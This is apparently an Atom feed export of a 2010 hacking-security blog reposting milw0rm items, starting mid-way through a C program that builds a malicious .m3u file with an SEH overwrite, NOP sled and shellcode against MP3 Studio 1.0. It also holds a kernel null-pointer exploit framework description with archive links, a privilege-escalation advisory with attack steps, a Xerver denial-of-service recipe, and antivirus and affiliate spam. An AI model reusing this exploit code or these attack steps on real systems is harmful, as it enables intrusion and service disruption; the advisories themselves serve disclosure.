"mplode.m3u"); FILE *fp = fopen(outfile, "w"); if (!fp) error("[*] Cannot output file\n"); fwrite("http://", 7, 1, fp); for (int i=0; i&lt;4103; i++) {  fwrite("\x41", 1, 1, fp); }  fwrite(nextseh, 4, 1, fp); fwrite(seh, 4, 1, fp);  for (int i=0; i&lt;500; i++) {  fwrite("\x90", 1, 1, fp); }  fwrite(shellcode, sizeof(shellcode), 1, fp); fclose(fp); fprintf(stderr, "MPlode vs MP3 Studio v1.0\n(C) dmc &lt;dmc@deadbeef.co.uk&gt;\n\n", outfile);&lt;br /&gt; fprintf(stderr, "[*] Success, exploit written to %s\n", outfile);&lt;br /&gt;&lt;br /&gt; exit(0);&lt;br /&gt;&lt;br /&gt; return 0;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;source &lt;a href="http://milw0rm.com" target="_blank"&gt;milw0rm.com&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-1324045893796678773?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1324045893796678773'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1324045893796678773'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2010/02/mp3-studio-10-m3u-file-local-buffer.html' title='MP3 Studio 1.0 (.m3u File) Local Buffer Overflow Exploit'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-1044213198989916015</id><published>2010-01-27T21:23:00.000+07:00</published><updated>2010-01-27T21:23:13.363+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Anti Virus'/><title type='text'>Using  Internet safely with Kaspersky Internet Security 2010</title><content type='html'>Fully Automated Real-Time Protection&lt;br /&gt;&lt;br /&gt;Kaspersky Internet Security 2010 stops your PC being slowed down by cybercriminals and delivers unsurpassed on-line safety whilst protecting your files, music and photos from hackers:&lt;br /&gt;&lt;br /&gt;* Keeps your money and identity safe&lt;br /&gt;* Protects against bank account fraud&lt;br /&gt;* Safeguards against online shopping threats&lt;br /&gt;* Cybercriminals won’t hi-jack your PC&lt;br /&gt;* Family protection from on-line predators&lt;br /&gt;* Your files won’t be ruined by hackers&lt;br /&gt;* Keeps your PC running smoothly&lt;br /&gt;* Safer Wi-Fi connections&lt;br /&gt;* Two way personal firewall&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;New And Improved Features&lt;br /&gt;Kaspersky Internet Security 2010 offers a number of new and improved features together with unique protection technologies to address the latest online threats, keep your PC running smoothly and customize protection according to your activities:&lt;br /&gt;&lt;br /&gt;* Unique Safe Run Mode for questionable applications and websites&lt;br /&gt;* Security Application Monitor to give you full picture on programs installed on your PC&lt;br /&gt;* Identity Information Controller to give valuable data an extra layer of protection&lt;br /&gt;* Kaspersky Toolbar for Internet browsers to warn you about infected or unsafe websites&lt;br /&gt;* Advanced identity theft protection, including improved secure Virtual Keyboard&lt;br /&gt;* Urgent Detection System to stop fast emerging threats&lt;br /&gt;* Next generation proactive protection from zero-day attacks and unknown threats&lt;br /&gt;* Special Game Mode to suspend alerts, updates and scans while you play&lt;br /&gt;&lt;br /&gt;Advanced Features For Better Protection&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;Kaspersky Internet Security 2010 has a range of unique tools for heightened security. Protecting your family and keeping your PC healthy:&lt;br /&gt;&lt;br /&gt;* Run questionable applications and websites in Safe Run Mode&lt;br /&gt;* Enter logins and passwords using secure Virtual Keyboard&lt;br /&gt;* Enable Parental Control for added child safety online&lt;br /&gt;* Turn on Game Mode to suspend alerts, updates and scans&lt;br /&gt;* Add folders and files with valuable data to the protected area&lt;br /&gt;* Scan system and installed applications for vulnerabilities&lt;br /&gt;* View applications working on your PC and customize their rules&lt;br /&gt;* Tune up your OS and Internet browser settings for better security&lt;br /&gt;* Restore correct system settings after malware removal&lt;br /&gt;* Burn a Rescue CD to restore your system in case of infection&lt;br /&gt;* Remove activity traces in your Internet browser (history, cookies, etc.)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Get Protection From a Range of Threats :&lt;br /&gt;Award-winning technologies in Kaspersky Internet Security 2010 protect you from cybercrime and a wide range of IT threats :&lt;br /&gt;&lt;br /&gt;* Viruses, Trojans, worms and other malware, spyware and adware&lt;br /&gt;* Rootkits, bootkits and other complex threats&lt;br /&gt;* Identity theft by keyloggers, screen capture malware or phishing scams&lt;br /&gt;* Botnets and various illegal methods of taking control of your PC&lt;br /&gt;* Zero-day attacks, new fast emerging and unknown threats&lt;br /&gt;* Drive-by download infections, network attacks and intrusions&lt;br /&gt;* Unwanted, offensive web content and spam&lt;br /&gt;&lt;br /&gt;&lt;a href="http://Kaspersky.com" target="_blank"&gt;Homepage&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-1044213198989916015?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1044213198989916015'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1044213198989916015'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2010/01/using-internet-safely-with-kaspersky.html' title='Using  Internet safely with Kaspersky Internet Security 2010'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-4806727677424841142</id><published>2010-01-27T21:18:00.000+07:00</published><updated>2010-01-27T21:18:41.929+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Exploit'/><title type='text'>Information Linux Null PTR Dereference Exploit Framework</title><content type='html'>To create your own exploit module for enlightenment, just name it&lt;br /&gt;   exp_whatever.c&lt;br /&gt;   It will be auto-compiled by the run_exploits.sh script and thrown into&lt;br /&gt;   the list of loaded exploit modules&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;   Each module must have the following features:&lt;br /&gt;   It must include this header file, exp_framework.h&lt;br /&gt;   A description of the exploit, the variable being named "desc"&lt;br /&gt;   A "prepare" function: int prepare(unsigned char *ptr)&lt;br /&gt;     where ptr is the ptr to the NULL mapping, which you are able to write to&lt;br /&gt;     This function can return the flags described below for prepare_the_exploit&lt;br /&gt;     Return 0 for failure otherwise&lt;br /&gt;   A "trigger" function: int trigger(void)&lt;br /&gt;     Return 0 for failure, nonzero for success&lt;br /&gt;   A "post" function: int post(void)&lt;br /&gt;     This function can return the flags described below for post_exploit&lt;br /&gt;   A "get_exploit_state_ptr" function:&lt;br /&gt;     int get_exploit_state_ptr(struct exploit_state *ptr)&lt;br /&gt;     Generally this will always be implemented as:&lt;br /&gt;     struct *exp_state;&lt;br /&gt;     int get_exploit_state_ptr(struct exploit_state *ptr)&lt;br /&gt;     {&lt;br /&gt;        exp_state = ptr;&lt;br /&gt;        return 0;&lt;br /&gt;     }&lt;br /&gt;     It gives you access to the exploit_state structure listed below,&lt;br /&gt;     get_kernel_sym allows you to resolve symbols&lt;br /&gt;     own_the_kernel is the function that takes control of the kernel&lt;br /&gt;      (in case you need its address to set up your buffer)&lt;br /&gt;     the other variables describe the exploit environment, so you can&lt;br /&gt;     for instance, loop through a number of vulnerable socket domains&lt;br /&gt;     until you detect ring0 execution has occurred.&lt;br /&gt;&lt;br /&gt;   That's it!&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;http://www.grsecurity.net/~spender/enlightenment.tgz&lt;br /&gt;back: http://milw0rm.com/sploits/2009-enlightenment.tgz&lt;br /&gt;&lt;br /&gt;source &lt;a href="http://milw0rm.com" target="_blank"&gt;milw0rm.com&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-4806727677424841142?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/4806727677424841142'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/4806727677424841142'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2010/01/information-linux-null-ptr-dereference.html' title='Information Linux Null PTR Dereference Exploit Framework'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-5281740437478409449</id><published>2010-01-08T15:25:00.001+07:00</published><updated>2010-01-08T15:26:30.355+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tutorial'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>Automated Vulnerability Detection System</title><content type='html'>&lt;b&gt;Automate Your Penetration Testing&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;AVDS is a network &lt;a href="http://en.wikipedia.org/wiki/Vulnerability" target="_blank"&gt;vulnerability&lt;/a&gt; assessment appliance for &lt;a href="http://en.wikipedia.org/wiki/Networks" target="_blank"&gt;networks&lt;/a&gt; of 50 to 200,000 nodes. It performs an in-depth inspection for &lt;a href="http://source-x.blogspot.com/search/label/Hacking%20Security"&gt;security&lt;/a&gt; weaknesses that can replace exhaustive &lt;a href="http://en.wikipedia.org/wiki/Penetration_testing" target="_blank"&gt;penetration testing&lt;/a&gt;. With each scan it will automatically find new equipment and services and add them to the inspection schedule. It then tests every node based on its characteristics and records your system's responses. &lt;br /&gt;&lt;br /&gt;In a matter of hours and with no network down time or interruption of services AVDS will generate detailed reports specifying network security weaknesses.&lt;br /&gt;&lt;br /&gt;Our database of tests is updated daily with the most recently discovered security vulnerabilities. The AVDS database includes over 10,000 known vulnerabilities and the updates include discoveries by our own team and those discovered by corporate and private security teams around the world.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Simple, Fast and Comprehensive&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Manual vulnerability assessment is expensive and infrequently done. Assessment software can be time consuming to set up and operate, plagued by high false positive rates and cause network resource issues.&lt;br /&gt;&lt;br /&gt;Automated Testing Using AVDS: &lt;br /&gt;• Gets your tactical security work done routinely and quickly&lt;br /&gt;• Provides the fixes you and your staff need for fast mitigation&lt;br /&gt;• Buys you time to focus on security strategy&lt;br /&gt;• Automatically scans new equipment, ports and applications&lt;br /&gt;• Scales to handle multiple networks, business units, countries&lt;br /&gt;• Reduces your patch-work by identifying exactly what is needed. &lt;br /&gt;&lt;br /&gt;&lt;b&gt;Security and Compliance Challenges&lt;/b&gt;&lt;br /&gt;&lt;a href="http://source-x.blogspot.com/2010/01/automated-vulnerability-detection.html"&gt;Read More&lt;/a&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The frequency and increasing severity of today's security threats are forcing companies to:&lt;br /&gt;• Simplifies PCI-DSS, SOX and HIPAA compliance and reduces costs&lt;br /&gt;• Strengthen current network security processes and procedures to protect against virulent worm/virus attacks from both external and internal threats&lt;br /&gt;• Deploy new security solutions that span the entire network&lt;br /&gt;• Restrict customer and partner access and permissions&lt;br /&gt;• Respond to "Security Compliance" mandates, IT upgrades and internal policy changes&lt;br /&gt;• Perform more frequent penetration tests.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Vulnerability Management&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;AVDS conducts automated vulnerability scans daily, weekly or monthly, or on ad-hoc basis. It records results and generates vulnerability trends for your entire WAN a LAN or single IP address. With three levels of reporting, each business unit can receive a report on it's own network and local results can be combined into a company wide picture.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Know What You Are Up Against&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Pin point your most vulnerable IPs by either a ranked list or graph. Use AVDS to identify exactly which patches, solutions and workarounds to install. Re-scan networks and hosts after solutions have been implemented to verify and document compliance and remediation.&lt;br /&gt;&lt;b&gt;&lt;br /&gt;Solutions to Vulnerabilities Delivered&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Each AVDS report contains the exact solutions to repair the problems found. This in-depth information shows how to fix and improve the security of your network, both as whole and for each of the devices in it. The recommended solutions include device specific information as well as custom tailored solutions for your environment.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Manage Vulnerabilities Across the Enterprise&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Whether your network is as small as one LAN or involves hundreds of business units separated by firewalls, or even continents, all testing and report generation can be managed and controlled from one location with individual reports being automatically delivered to each business unit. Multiple scanners can be used to overcome bandwidth restrictions, firewall segmentations or to load balance and provide fault tolerance.&lt;br /&gt;&lt;br /&gt;Source &lt;a href="http://www.beyondsecurity.com/" target="_blank"&gt;beyondsecurity.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Another option for computer and internet security &lt;a href="http://hemlet.tccau.hop.clickbank.net/"&gt;here&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-5281740437478409449?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5281740437478409449'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5281740437478409449'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2010/01/automated-vulnerability-detection.html' title='Automated Vulnerability Detection System'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-189540158443071410</id><published>2010-01-06T11:40:00.000+07:00</published><updated>2010-01-06T11:40:47.910+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>Network Security Software</title><content type='html'>&lt;b&gt;&lt;i&gt;&lt;a href="http://en.wikipedia.org/wiki/Network_security" target="_blank"&gt;Network security&lt;/a&gt; threat&lt;/i&gt;&lt;/b&gt; is one of the major concerns for all online businesses today. As soon as the computer software was produced the hackers set off on their task of destroying software. In networks the more important thing than software is the data as the data contain sensitive information. &lt;a href="http://source-x.blogspot.com/search/label/Hacking%20Security"&gt;Hackers &lt;/a&gt;send their programs to either destroy the data bases or steal data. Both are equally dreaded by network administrators.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Network security threat&lt;/b&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;To avert network security threat, the software companies have come out with software which is able to locate intruding software and prevent them from accessing data bases. To use this software special training should be provided to network administrators. A network security course conducted by professionals for the network administrators will be of immense value for the security of the network.&lt;br /&gt;As the viruses and other programs used by hackers are posing a continuous network security threat, the knowledge of network administrators need to be updated continuously. As such a network security course at regular intervals is the way to avert network security vulnerability.&lt;br /&gt;&lt;br /&gt;There are various software programs produced by many software companies such as Norton antivirus, AVG. Kaspersky, and McAfee. These software companies are updating their software at regular intervals, as the hackers learn about the software as soon as an update is released. Then they make viruses and other programs to beat the particular software. When the Computer network security software companies come to know that, they make an update to beat the malware. This goes on in a vicious cycle. The poor network managers suffer most, for no fault of theirs, trying to cope with all these Network security threats, all because of the network security vulnerability of their net works.&lt;br /&gt;&lt;br /&gt;Once the proper software is installed, timely updates are arranged and the necessary training given to the administrators, a network could run with out much security threat.&lt;br /&gt;&lt;br /&gt;source &lt;a href="http://g-hwebdesigns.com" target="_blank"&gt;g-hwebdesigns.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;need more antivirus solution &lt;a href="http://hemlet.6dantiv.hop.clickbank.net/?tid=81" target="_blank"&gt;here&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-189540158443071410?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/189540158443071410'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/189540158443071410'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2010/01/network-security-software.html' title='Network Security Software'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-4375097041692222257</id><published>2010-01-06T11:29:00.000+07:00</published><updated>2010-01-06T11:29:54.099+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Anonymouse'/><title type='text'>Web hosting sites</title><content type='html'>&lt;a href="http://en.wikipedia.org/wiki/Web_hosting" target="_blank"&gt;Web hosting&lt;/a&gt; is now widely used of netter to introduce their web commercial nette, lot from year to year using good web hosting service is paid or for free, and many benefits if we use the web-hosting, some of which we become more web easy to remember, unique and certainly more commercially profitable. &lt;br /&gt;technically, the use of web hosting can be seen from some of the features available, because many web hosting providers that offer additional features such as relatively low prices, large disk space, usage period and warranty service, even free web hosting providers even dare to compete with providers are paid, our living choices. &lt;br /&gt;Through this website, the netter can choose web hosting providers the most demanding of the world, best 10 web hosting sites that dare to compete provided from various sides, ranging from price, how to setup, domain, disk space, money back, and the usage period . &lt;br /&gt;Through this website explained that the list of top web hosting is the most widely sought after by netter, affordable prices is one reason why the netter choose one of the ten web hosting these sites. &lt;br /&gt;how about you? are already interested in using the best web hosting around the world to introduce your personal website? &lt;br /&gt;The 10 top web hosting sites are among others BlueHost, JustHost, inmotion hosting, HostMonster, fatcow, supergreen, HostGator, 1and1, GoDaddy, and the last isyahoo web hosting, good luck&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-4375097041692222257?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/4375097041692222257'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/4375097041692222257'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2010/01/web-hosting-sites.html' title='Web hosting sites'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-91161149726530710</id><published>2010-01-06T11:24:00.000+07:00</published><updated>2010-01-06T11:24:55.504+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerability'/><title type='text'>Protector Plus Antivirus Local Privilege Escalation Vulnerability</title><content type='html'>&lt;pre&gt;ShineShadow Security Report 15092009-09&lt;br /&gt;&lt;br /&gt;TITLE&lt;br /&gt;&lt;br /&gt;Local privilege escalation vulnerability in Protector Plus antivirus software&lt;br /&gt;&lt;br /&gt;BACKGROUND&lt;br /&gt;&lt;br /&gt;Protector Plus range of antivirus products are known the world over for&lt;br /&gt;their efficiency and reliability. Protector Plus Antivirus Software is&lt;br /&gt;available for Windows Vista, Windows XP, Windows Me, Windows 2000,&lt;br /&gt;Windows 98, Windows 2000/2003/NT server and NetWare platforms. Protector&lt;br /&gt;Plus Antivirus Software is the ideal antivirus protection for your&lt;br /&gt;computer against all types of malware like viruses, trojans, worms and&lt;br /&gt;spyware.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;-- www.pspl.com&lt;br /&gt;&lt;br /&gt;VULNERABLE PRODUCTS&lt;br /&gt;&lt;br /&gt;Protector Plus 2009 for Windows Desktops (8.0.E03)&lt;br /&gt;Protector Plus 2009 for Windows Server (8.0.E03)&lt;br /&gt;Protector Plus Professional (9.1.001)&lt;br /&gt;&lt;br /&gt;Previous versions may also be affected&lt;br /&gt;&lt;br /&gt;DETAILS&lt;br /&gt;&lt;br /&gt;Protector Plus installs the own program files with insecure permissions&lt;br /&gt;(Everyone - Full Control). Local attacker (unprivileged user) can&lt;br /&gt;replace some files (for example, executable files of Protector services)&lt;br /&gt;by malicious file and execute arbitary code with SYSTEM privileges. This&lt;br /&gt;is local privilege escalation vulnerability.&lt;br /&gt; &lt;br /&gt;For example, the following attack scenario could be used:&lt;br /&gt;1. An attacker (unprivileged user) renames one of the Protector program&lt;br /&gt;files (below, the FILE). For example, the FILE could be - PPAVMON.exe&lt;br /&gt;(Protector Plus Anti-virus Monitor Service).&lt;br /&gt;2. An attacker copies his malicious executable file (with same name as&lt;br /&gt;the old filename of the FILE - PPAVMON.exe) to Protector folder.&lt;br /&gt;3. Restart the system.&lt;br /&gt;After restart attackers malicious file will be executed with SYSTEM&lt;br /&gt;privileges.&lt;br /&gt;&lt;br /&gt;EXPLOITATION&lt;br /&gt;&lt;br /&gt;This is local privilege escalation vulnerability. An attacker must have&lt;br /&gt;valid logon credentials to a system where vulnerable software is&lt;br /&gt;installed.&lt;br /&gt;&lt;br /&gt;WORKAROUND&lt;br /&gt;&lt;br /&gt;No workarounds&lt;br /&gt;&lt;br /&gt;DISCLOSURE TIMELINE&lt;br /&gt;&lt;br /&gt;31/08/2009 Initial vendor notification. Secure contacts requested.&lt;br /&gt;01/09/2009 Vendor response &lt;br /&gt;03/09/2009 Vulnerability details sent. Confirmation requested. – no reply&lt;br /&gt;09/09/2009 Vulnerability details sent. Confirmation requested. – no reply&lt;br /&gt;11/09/2009 Last attempt to get reply from vendor. Vulnerability details sent. Confirmation requested. – no reply&lt;br /&gt;15/09/2009 Advisory released&lt;br /&gt;&lt;br /&gt;CREDITS &lt;br /&gt;&lt;br /&gt;Maxim A. Kulakov (aka ShineShadow) &lt;br /&gt;ss_contacts[at]hotmail.com &lt;br /&gt;&lt;/pre&gt;&lt;pre&gt;&lt;/pre&gt;&lt;pre&gt;source &lt;a href="http://milw0rm.com/" target="_blank"&gt;milw0rm.com&lt;/a&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-91161149726530710?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/91161149726530710'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/91161149726530710'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2010/01/protector-plus-antivirus-local.html' title='Protector Plus Antivirus Local Privilege Escalation Vulnerability'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-5556366133354322638</id><published>2009-12-09T20:52:00.005+07:00</published><updated>2009-12-09T21:23:12.893+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Download'/><category scheme='http://www.blogger.com/atom/ns#' term='Anti Virus'/><title type='text'>IceSword  Anti Rootkit Software</title><content type='html'>A rootkit is a collection of software that aims to hide processes, files and data systems running operating systems from a shelter where he (administrator level access). Rootkit which was a harmless application, but the latter is widely used by malware to help intruders goals, maintain their action into the system so as not detected. Rootkit present in a variety of operating systems such as Linux, Solaris and Microsoft Windows. This rootkit is often modify parts of the operating system and also install themselves as drivers or modules kernel. Imaginable how dangerous if this happens.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ltm3Etcp4Hw/Sx-stfYVGPI/AAAAAAAAABE/Rs1BFGGvJJ4/s1600-h/icesword-detect-hidden-files-process.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 185px;" src="http://4.bp.blogspot.com/_Ltm3Etcp4Hw/Sx-stfYVGPI/AAAAAAAAABE/Rs1BFGGvJJ4/s320/icesword-detect-hidden-files-process.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5413235174640261362" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;There are some virus/trojan/rootkit that is able to hide itself completely from Windows Task Manager and believe it or not, even the famous Process Explorer and Process Hacker cannot even detect the hidden process. Other than that, when the virus is active, they can also make the file hidden until you cannot locate it using Windows Explorer. I found a tool called IceSword which has a Windows Explorer-like interface but displays hidden processes and resources that Windows Explorer would never show.&lt;br /&gt;Do note that IceSword isn’t a “click-here-to-delete-rootkits” product but a sophisticated discovery tool that can protect against sinister rootkits if used before they infect a machine. One thing I really like about IceSword is it is portable, free and can be used in Safe Mode. Normally tools that is used to detect hidden process and files (such as DeepMonitor and many more) requires a special driver&lt;br /&gt;installed and it won’t work in Safe Mode since third party drivers/services are not loaded in that environment.&lt;br /&gt;Here’s a piece of bad news that might be a turn off to a lot of people. IceSword is a software made in China by a person called PJF. I know now even more people would stay away from Chinese software because of what IObit did but so far IceSword has a very good reputation. Scanning it in VirusTotal with 41 antivirus and only ClamAV detects it as a threat just because the program is packed/compressed with ASPack.&lt;br /&gt;Anyway I’m just sharing with you on a tool which I found useful and if you’re not comfortable using it, then by all means go ahead and use GMER which is very similar to IceSword. It’s good to have an alternative in case one of it doesn’t work. Here’s a short video demo of IceSword able to detect a folder which is completely hidden from Windows Explorer even if the Folder Options is set to show hidden files and folders.&lt;br /&gt;&lt;br /&gt;Download IceSword Anti Rootkit Software &lt;a href="   http://www.ziddu.com/download/7668749/IceSword122en.zip.html"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;IceSword122en.zip MD5 : 49582e999155cdf2812a1d645caf0831&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-5556366133354322638?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5556366133354322638'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5556366133354322638'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/12/icesword-anti-rootkit-software.html' title='IceSword  Anti Rootkit Software'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_Ltm3Etcp4Hw/Sx-stfYVGPI/AAAAAAAAABE/Rs1BFGGvJJ4/s72-c/icesword-detect-hidden-files-process.png' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-5519394898727175132</id><published>2009-12-09T20:46:00.000+07:00</published><updated>2009-12-09T20:50:00.823+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tutorial'/><category scheme='http://www.blogger.com/atom/ns#' term='Denial of Service'/><title type='text'>Xerver HTTP Server Remote Denial of Service</title><content type='html'>Xerver v4.32 is a Windows based HTTP server. This is the latest version of&lt;br /&gt;the application available.&lt;br /&gt;&lt;br /&gt;Xerver v4.32 is vulnerable to a remote denial of service through following means.&lt;br /&gt;&lt;br /&gt;Xerver ships with a web based configuration program, essentially making this DoS&lt;br /&gt;remote if and when the Remote Setup is running.&lt;br /&gt;&lt;br /&gt;The admin package runs on port 32123 and does not require any form of &lt;br /&gt;authentication to make changes to the server configuration.&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;- Bug -&lt;br /&gt;&lt;br /&gt;If the HTTP Server port is set to any kind of letter combination, the server will&lt;br /&gt;crash and be unable to be restarted unless the configuration file is manually&lt;br /&gt;edited to remove the letters and put back to a number (ie. 80).&lt;br /&gt;&lt;br /&gt;- Example -&lt;br /&gt;&lt;br /&gt;1. http://172.16.2.101:32123/?action=wizardStep1&lt;br /&gt;2. Enter anything in the port field, "Dr_IDE"&lt;br /&gt;3. Click Save and Continue&lt;br /&gt;&lt;br /&gt;- Results - &lt;br /&gt;&lt;br /&gt;The server will crash hard, and you will be unable to restart it. You must edit the &lt;br /&gt;configuration file, Xerver2.cfg and replace the first line of the file with a Port&lt;br /&gt;number.&lt;br /&gt;&lt;br /&gt;- Note - &lt;br /&gt;&lt;br /&gt;I tried to make this a possible XSS attack but I couldn't manage. Perhaps someone &lt;br /&gt;else can figure it out.&lt;br 